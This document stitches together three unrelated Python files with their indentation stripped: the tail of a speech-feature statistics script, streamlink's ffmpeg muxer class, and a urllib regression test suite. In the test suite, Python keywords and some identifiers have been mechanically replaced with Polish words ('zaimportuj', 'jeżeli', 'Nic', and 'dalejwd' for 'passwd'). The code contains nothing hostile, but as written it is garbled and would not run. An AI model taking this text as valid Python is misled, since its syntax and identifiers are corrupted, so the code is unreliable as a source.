format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/calc_stats.log")
logging.getLogger().addHandler(logging.StreamHandler())
else:
logging.basicConfig(level=logging.WARN,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/calc_stats.log")
logging.getLogger().addHandler(logging.StreamHandler())
logging.warn("logging is disabled.")
# read list and define scaler
filenames = read_txt(args.feats)
logging.info("number of training utterances = "+str(len(filenames)))
def calc_stats(filenames, cpu, feat_mceplf0cap_list, feat_orglf0_list, varmcep_list, f0_list, melsp_list, varmelsp_list):
feat_mceplf0cap_arr = None
feat_orglf0_arr = None
varmcep_arr = None
f0_arr = None
melsp_arr = None
varmelsp_arr = None
count = 0
# process over all of data
for filename in filenames:
logging.info(filename)
feat_mceplf0cap = read_hdf5(filename, "/feat_mceplf0cap")
logging.info(feat_mceplf0cap.shape)
feat_orglf0 = read_hdf5(filename, "/feat_org_lf0")
logging.info(feat_orglf0.shape)
melsp = read_hdf5(filename, "/log_1pmelmagsp")
logging.info(melsp.shape)
if feat_mceplf0cap_arr is not None:
feat_mceplf0cap_arr = np.r_[feat_mceplf0cap_arr, feat_mceplf0cap]
else:
feat_mceplf0cap_arr = feat_mceplf0cap
if feat_orglf0_arr is not None:
feat_orglf0_arr = np.r_[feat_orglf0_arr, feat_orglf0]
else:
feat_orglf0_arr = feat_orglf0
logging.info('feat')
logging.info(feat_mceplf0cap_arr.shape)
logging.info(feat_orglf0_arr.shape)
if varmcep_arr is not None:
varmcep_arr = np.r_[varmcep_arr, np.var(feat_mceplf0cap[:,-args.mcep_dim:], axis=0, keepdims=True)]
else:
varmcep_arr = np.var(feat_mceplf0cap[:,-args.mcep_dim:], axis=0, keepdims=True)
logging.info('var')
logging.info(varmcep_arr.shape)
logging.info('f0')
f0 = read_hdf5(filename, "/f0_range")
logging.info(f0.shape)
logging.info('f0 > 0')
f0 = f0[np.nonzero(f0)]
logging.info(f0.shape)
if f0_arr is not None:
f0_arr = np.r_[f0_arr, f0]
else:
f0_arr = f0
logging.info(f0_arr.shape)
if melsp_arr is not None:
melsp_arr = np.r_[melsp_arr, melsp]
else:
melsp_arr = melsp
logging.info(melsp_arr.shape)
if varmelsp_arr is not None:
varmelsp_arr = np.r_[varmelsp_arr, np.var((np.exp(melsp)-1)/10000, axis=0, keepdims=True)]
else:
varmelsp_arr = np.var((np.exp(melsp)-1)/10000, axis=0, keepdims=True)
logging.info('var')
logging.info(varmelsp_arr.shape)
count += 1
logging.info("cpu %d %d %d %d %d %d %d %d" % (cpu, count, len(feat_mceplf0cap_arr), len(feat_orglf0_arr), len(varmcep_arr), len(f0_arr), len(melsp_arr), len(varmelsp_arr)))
#if count >= 5:
# break
feat_mceplf0cap_list.append(feat_mceplf0cap_arr)
feat_orglf0_list.append(feat_orglf0_arr)
varmcep_list.append(varmcep_arr)
f0_list.append(f0_arr)
melsp_list.append(melsp_arr)
varmelsp_list.append(varmelsp_arr)
# divie list
feat_lists = np.array_split(filenames, args.n_jobs)
feat_lists = [f_list.tolist() for f_list in feat_lists]
for i in range(len(feat_lists)):
logging.info("%d %d" % (i+1, len(feat_lists[i])))
# multi processing
with mp.Manager() as manager:
processes = []
feat_mceplf0cap_list = manager.list()
feat_orglf0_list = manager.list()
varmcep_list = manager.list()
f0_list = manager.list()
melsp_list = manager.list()
varmelsp_list = manager.list()
for i, feat_list in enumerate(feat_lists):
p = mp.Process(target=calc_stats, args=(feat_list, i+1, feat_mceplf0cap_list, feat_orglf0_list, varmcep_list, f0_list, melsp_list, varmelsp_list,))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
feat_mceplf0cap = None
for i in range(len(feat_mceplf0cap_list)):
if feat_mceplf0cap_list[i] is not None:
logging.info(i)
logging.info(feat_mceplf0cap_list[i].shape)
if feat_mceplf0cap is not None:
feat_mceplf0cap = np.r_[feat_mceplf0cap, feat_mceplf0cap_list[i]]
else:
feat_mceplf0cap = feat_mceplf0cap_list[i]
logging.info('feat mceplf0cap: %d' % (len(feat_mceplf0cap)))
logging.info(feat_mceplf0cap.shape)
feat_orglf0 = None
for i in range(len(feat_orglf0_list)):
if feat_orglf0_list[i] is not None:
logging.info(i)
logging.info(feat_orglf0_list[i].shape)
if feat_orglf0 is not None:
feat_orglf0 = np.r_[feat_orglf0, feat_orglf0_list[i]]
else:
feat_orglf0 = feat_orglf0_list[i]
logging.info('feat orglf0: %d' % (len(feat_orglf0)))
logging.info(feat_orglf0.shape)
var_range = None
for i in range(len(varmcep_list)):
if varmcep_list[i] is not None:
logging.info(i)
logging.info(varmcep_list[i].shape)
if var_range is not None:
var_range = np.r_[var_range, varmcep_list[i]]
else:
var_range = varmcep_list[i]
logging.info('var mcep: %d' % (len(var_range)))
logging.info(var_range.shape)
f0s_range = None
for i in range(len(f0_list)):
if f0_list[i] is not None:
logging.info(i)
logging.info(f0_list[i].shape)
if f0s_range is not None:
f0s_range = np.r_[f0s_range, f0_list[i]]
else:
f0s_range = f0_list[i]
logging.info('f0: %d' % (len(f0s_range)))
logging.info(f0s_range.shape)
melsp = None
for i in range(len(melsp_list)):
if melsp_list[i] is not None:
logging.info(i)
logging.info(melsp_list[i].shape)
if melsp is not None:
melsp = np.r_[melsp, melsp_list[i]]
else:
melsp = melsp_list[i]
logging.info('melsp: %d' % (len(melsp)))
logging.info(melsp.shape)
var_melsp = None
for i in range(len(varmelsp_list)):
if varmelsp_list[i] is not None:
logging.info(i)
logging.info(varmelsp_list[i].shape)
if var_melsp is not None:
var_melsp = np.r_[var_melsp, varmelsp_list[i]]
else:
var_melsp = varmelsp_list[i]
logging.info('var melsp: %d' % (len(var_melsp)))
logging.info(var_melsp.shape)
scaler_feat_mceplf0cap = StandardScaler()
scaler_feat_orglf0 = StandardScaler()
scaler_feat_mceplf0cap.partial_fit(feat_mceplf0cap)
scaler_feat_orglf0.partial_fit(feat_orglf0)
scaler_melsp = StandardScaler()
scaler_melsp.partial_fit(melsp)
mean_feat_mceplf0cap = scaler_feat_mceplf0cap.mean_
scale_feat_mceplf0cap = scaler_feat_mceplf0cap.scale_
mean_feat_orglf0 = scaler_feat_orglf0.mean_
scale_feat_orglf0 = scaler_feat_orglf0.scale_
gv_range_mean = np.mean(np.array(var_range), axis=0)
gv_range_var = np.var(np.array(var_range), axis=0)
logging.info(gv_range_mean)
logging.info(gv_range_var)
f0_range_mean = np.mean(f0s_range)
f0_range_std = np.std(f0s_range)
logging.info(f0_range_mean)
logging.info(f0_range_std)
lf0_range_mean = np.mean(np.log(f0s_range))
lf0_range_std = np.std(np.log(f0s_range))
logging.info(lf0_range_mean)
logging.info(lf0_range_std)
logging.info(mean_feat_mceplf0cap)
logging.info(scale_feat_mceplf0cap)
write_hdf5(args.stats, "/mean_feat_mceplf0cap", mean_feat_mceplf0cap)
write_hdf5(args.stats, "/scale_feat_mceplf0cap", scale_feat_mceplf0cap)
logging.info(mean_feat_orglf0)
logging.info(scale_feat_orglf0)
write_hdf5(args.stats, "/mean_feat_org_lf0", mean_feat_orglf0)
write_hdf5(args.stats, "/scale_feat_org_lf0", scale_feat_orglf0)
write_hdf5(args.stats, "/gv_range_mean", gv_range_mean)
write_hdf5(args.stats, "/gv_range_var", gv_range_var)
write_hdf5(args.stats, "/f0_range_mean", f0_range_mean)
write_hdf5(args.stats, "/f0_range_std", f0_range_std)
write_hdf5(args.stats, "/lf0_range_mean", lf0_range_mean)
write_hdf5(args.stats, "/lf0_range_std", lf0_range_std)
mean_melsp = scaler_melsp.mean_
scale_melsp = scaler_melsp.scale_
gv_melsp_mean = np.mean(np.array(var_melsp), axis=0)
gv_melsp_var = np.var(np.array(var_melsp), axis=0)
logging.info(gv_melsp_mean)
logging.info(gv_melsp_var)
logging.info(mean_melsp)
logging.info(scale_melsp)
write_hdf5(args.stats, "/mean_melsp", mean_melsp)
write_hdf5(args.stats, "/scale_melsp", scale_melsp)
write_hdf5(args.stats, "/gv_melsp_mean", gv_melsp_mean)
write_hdf5(args.stats, "/gv_melsp_var", gv_melsp_var)
if __name__ == "__main__":
main()
|
ffmpegmux.py
|
import logging
import subprocess
import sys
import threading
from streamlink import StreamError
from streamlink.compat import devnull, which
from streamlink.stream.stream import Stream, StreamIO
from streamlink.utils.named_pipe import NamedPipe, NamedPipeBase
log = logging.getLogger(__name__)
class MuxedStream(Stream):
__shortname__ = "muxed-stream"
def __init__(self, session, *substreams, **options):
super(MuxedStream, self).__init__(session)
self.substreams = substreams
self.subtitles = options.pop("subtitles", {})
self.options = options
def open(self):
fds = []
metadata = self.options.get("metadata", {})
maps = self.options.get("maps", [])
# only update the maps values if they haven't been set
update_maps = not maps
for i, substream in enumerate(self.substreams):
log.debug("Opening {0} substream".format(substream.shortname()))
if update_maps:
maps.append(len(fds))
fds.append(substream and substream.open())
for i, subtitle in enumerate(self.subtitles.items()):
language, substream = subtitle
log.debug("Opening {0} subtitle stream".format(substream.shortname()))
if update_maps:
maps.append(len(fds))
fds.append(substream and substream.open())
metadata["s:s:{0}".format(i)] = ["language={0}".format(language)]
self.options["metadata"] = metadata
self.options["maps"] = maps
return FFMPEGMuxer(self.session, *fds, **self.options).open()
@classmethod
def is_usable(cls, session):
return FFMPEGMuxer.is_usable(session)
class FFMPEGMuxer(StreamIO):
__commands__ = ['ffmpeg', 'ffmpeg.exe', 'avconv', 'avconv.exe']
DEFAULT_OUTPUT_FORMAT = "matroska"
DEFAULT_VIDEO_CODEC = "copy"
DEFAULT_AUDIO_CODEC = "copy"
@staticmethod
def copy_to_pipe(stream, pipe):
# type: (StreamIO, NamedPipeBase)
log.debug("Starting copy to pipe: {0}".format(pipe.path))
pipe.open()
while not stream.closed:
try:
data = stream.read(8192)
if len(data):
pipe.write(data)
else:
break
except (IOError, OSError):
log.error("Pipe copy aborted: {0}".format(pipe.path))
break
try:
pipe.close()
except (IOError, OSError): # might fail closing, but that should be ok for the pipe
pass
log.debug("Pipe copy complete: {0}".format(pipe.path))
def __init__(self, session, *streams, **options):
if not self.is_usable(session):
raise StreamError("cannot use FFMPEG")
self.session = session
self.process = None
self.streams = streams
self.pipes = [NamedPipe() for _ in self.streams]
self.pipe_threads = [threading.Thread(target=self.copy_to_pipe, args=(stream, np))
for stream, np in
zip(self.streams, self.pipes)]
ofmt = session.options.get("ffmpeg-fout") or options.pop("format", self.DEFAULT_OUTPUT_FORMAT)
outpath = options.pop("outpath", "pipe:1")
videocodec = session.options.get("ffmpeg-video-transcode") or options.pop("vcodec", self.DEFAULT_VIDEO_CODEC)
audiocodec = session.options.get("ffmpeg-audio-transcode") or options.pop("acodec", self.DEFAULT_AUDIO_CODEC)
metadata = options.pop("metadata", {})
maps = options.pop("maps", [])
copyts = session.options.get("ffmpeg-copyts") or options.pop("copyts", False)
start_at_zero = session.options.get("ffmpeg-start-at-zero") or options.pop("start_at_zero", False)
self._cmd = [self.command(session), '-nostats', '-y']
for np in self.pipes:
self._cmd.extend(["-i", np.path])
self._cmd.extend(['-c:v', videocodec])
self._cmd.extend(['-c:a', audiocodec])
add_audio = options.pop("add_audio", False)
for m in maps:
if not m and add_audio:
self._cmd.extend(["-map", "0:v:0"])
else:
self._cmd.extend(["-map", str(m)])
if copyts:
self._cmd.extend(["-copyts"])
if start_at_zero:
self._cmd.extend(["-start_at_zero"])
for stream, data in metadata.items():
for datum in data:
stream_id = ":{0}".format(stream) if stream else ""
self._cmd.extend(["-metadata{0}".format(stream_id), datum])
self._cmd.extend(['-f', ofmt, outpath])
log.debug("ffmpeg command: {0}".format(' '.join(self._cmd)))
self.close_errorlog = False
if session.options.get("ffmpeg-verbose"):
self.errorlog = sys.stderr
elif session.options.get("ffmpeg-verbose-path"):
self.errorlog = open(session.options.get("ffmpeg-verbose-path"), "w")
self.close_errorlog = True
else:
self.errorlog = devnull()
def open(self):
for t in self.pipe_threads:
t.daemon = True
t.start()
self.process = subprocess.Popen(self._cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=self.errorlog)
return self
@classmethod
def is_usable(cls, session):
return cls.command(session) is not None
@classmethod
def command(cls, session):
command = []
if session.options.get("ffmpeg-ffmpeg"):
command.append(session.options.get("ffmpeg-ffmpeg"))
for cmd in command or cls.__commands__:
if which(cmd):
return cmd
def read(self, size=-1):
data = self.process.stdout.read(size)
return data
def close(self):
if self.closed:
return
log.debug("Closing ffmpeg thread")
if self.process:
# kill ffmpeg
self.process.kill()
self.process.stdout.close()
# close the streams
for stream in self.streams:
if hasattr(stream, "close") and callable(stream.close):
stream.close()
log.debug("Closed all the substreams")
if self.close_errorlog:
self.errorlog.close()
self.errorlog = None
super(FFMPEGMuxer, self).close()
|
test_urllib.py
|
"""Regresssion tests dla urllib"""
zaimportuj urllib.parse
zaimportuj urllib.request
zaimportuj urllib.error
zaimportuj http.client
zaimportuj email.message
zaimportuj io
zaimportuj unittest
z unittest.mock zaimportuj patch
z test zaimportuj support
zaimportuj os
spróbuj:
zaimportuj ssl
wyjąwszy ImportError:
ssl = Nic
zaimportuj sys
zaimportuj tempfile
z nturl2path zaimportuj url2pathname, pathname2url
z base64 zaimportuj b64encode
zaimportuj collections
def hexescape(char):
"""Escape char jako RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
jeżeli len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
zwróć "%" + hex_repr
# Shortcut dla testing FancyURLopener
_urlopener = Nic
def urlopen(url, data=Nic, proxies=Nic):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
jeżeli proxies jest nie Nic:
opener = urllib.request.FancyURLopener(proxies=proxies)
albo_inaczej nie _urlopener:
przy support.check_warnings(
('FancyURLopener style of invoking requests jest deprecated.',
DeprecationWarning)):
opener = urllib.request.FancyURLopener()
_urlopener = opener
inaczej:
opener = _urlopener
jeżeli data jest Nic:
zwróć opener.open(url)
inaczej:
zwróć opener.open(url, data)
def fakehttp(fakedata):
klasa FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
zwróć self
def read(self, amt=Nic):
jeżeli self.closed:
zwróć b""
zwróć io.BytesIO.read(self, amt)
def readline(self, length=Nic):
jeżeli self.closed:
zwróć b""
zwróć io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
jeżeli self.io_refs == 0:
io.BytesIO.close(self)
klasa FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data dla verification w urlopen tests.
buf = Nic
fakesock = FakeSocket(fakedata)
def connect(self):
self.sock = self.fakesock
zwróć FakeHTTPConnection
klasa FakeHTTPMixin(object):
def fakehttp(self, fakedata):
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fakehttp(fakedata)
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
klasa FakeFTPMixin(object):
def fakeftp(self):
klasa FakeFtpWrapper(object):
def __init__(self, user, dalejwd, host, port, dirs, timeout=Nic,
persistent=Prawda):
dalej
def retrfile(self, file, type):
zwróć io.BytesIO(), 0
def close(self):
dalej
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
klasa urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test jako much functionality jako possible so jako to cut down on reliance
on connecting to the Net dla testing.
"""
def setUp(self):
# Create a temp file to use dla testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
spróbuj:
f.write(self.text)
w_końcu:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
dla attr w ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertPrawda(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" zwróć an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did nie zwróć an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did nie zwróć the expected text")
def test_close(self):
# Test close() by calling it here oraz then having it be called again
# by the tearDown() method dla the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNic(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line z the
# comparison.
# Use the iterator w the usual implicit way to test dla ticket #4608.
dla line w self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
klasa ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
dla k w list(os.environ):
jeżeli 'proxy' w k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
usuń self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies przy space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com')
self.assertPrawda(urllib.request.proxy_bypass_environment('anotherdomain.com'))
klasa urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
spróbuj:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
w_końcu:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments w the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
spróbuj:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
w_końcu:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
spróbuj:
resp = urlopen("http://www.python.org")
self.assertPrawda(resp.fp.will_close)
w_końcu:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but nie "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should podnieś OSError dla many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
spróbuj:
self.assertRaises(OSError, urlopen, "http://python.org/")
w_końcu:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should podnieś OSError dla many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
spróbuj:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://python.org/")
w_końcu:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() podnieśs OSError jeżeli the underlying socket does nie send any
# data. (#1680230)
self.fakehttp(b'')
spróbuj:
self.assertRaises(OSError, urlopen, "http://something")
w_końcu:
self.unfakehttp()
def test_missing_localfile(self):
# Test dla #10836
przy self.assertRaises(urllib.error.URLError) jako e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertPrawda(e.exception.filename)
self.assertPrawda(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
spróbuj:
self.assertPrawda(os.path.exists(tmp_file))
przy urlopen(tmp_fileurl) jako fobj:
self.assertPrawda(fobj)
w_końcu:
os.close(fd)
os.unlink(tmp_file)
self.assertNieprawda(os.path.exists(tmp_file))
przy self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
przy self.assertRaises(urllib.error.URLError) jako e:
urlopen(test_ftp_url)
self.assertNieprawda(e.exception.filename)
self.assertPrawda(e.exception.reason)
def test_ftp_nonexisting(self):
przy self.assertRaises(urllib.error.URLError) jako e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertNieprawda(e.exception.filename)
self.assertPrawda(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
spróbuj:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
w_końcu:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
spróbuj:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
w_końcu:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
spróbuj:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be w place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted w URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
w_końcu:
self.unfakehttp()
def test_URLopener_deprecation(self):
przy support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
przy self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
klasa urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- oraz unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image przy one black oraz one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such jako "\n", " ", "%0A", oraz "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
dla attr w ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertPrawda(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
klasa urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item w the list jest a file
# name (absolute path albo relative to the current working directory).
# All files w this list will be deleted w the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# jest the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
spróbuj:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
w_końcu:
spróbuj: FILE.close()
wyjąwszy: dalej
def tearDown(self):
# Delete the temporary files.
dla each w self.tempFiles:
spróbuj: os.remove(each)
wyjąwszy: dalej
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
spróbuj:
filePath.encode("utf-8")
wyjąwszy UnicodeEncodeError:
podnieś unittest.SkipTest("filePath jest nie encodable to utf8")
zwróć "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file dla deletion during the test fixture tear down, oraz
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
spróbuj:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
w_końcu:
spróbuj: newFile.close()
wyjąwszy: dalej
zwróć newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned oraz
# a headers value jest returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did nie get a email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertPrawda(os.path.exists(second_temp), "copy of the file was nie "
"made")
FILE = open(second_temp, 'rb')
spróbuj:
text = FILE.read()
FILE.close()
w_końcu:
spróbuj: FILE.close()
wyjąwszy: dalej
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" jest established oraz once when the block jest
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
